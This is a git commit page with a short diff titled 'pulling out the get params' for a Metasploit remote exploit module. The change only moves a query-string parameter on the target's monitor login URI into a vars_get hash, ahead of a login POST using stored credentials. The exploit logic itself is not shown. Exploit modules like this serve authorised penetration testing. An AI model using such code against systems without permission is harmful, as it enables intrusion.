pulling out the get params
parent
52db99bfae
commit
81fa068ef0
|
@ -91,9 +91,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# login
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, 'monitor/index.php/auth/login?uri=tac%2Findex'),
|
||||
'uri' => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),
|
||||
'method' => 'POST',
|
||||
'vars_post' =>
|
||||
'vars_get' =>
|
||||
{
|
||||
'uri' => 'tac/index'
|
||||
},
|
||||
'vars_post' =>
|
||||
{
|
||||
'csrf_token' => '',
|
||||
'username' => datastore['USERNAME'],
|
||||
|
|
Loading…
Reference in New Issue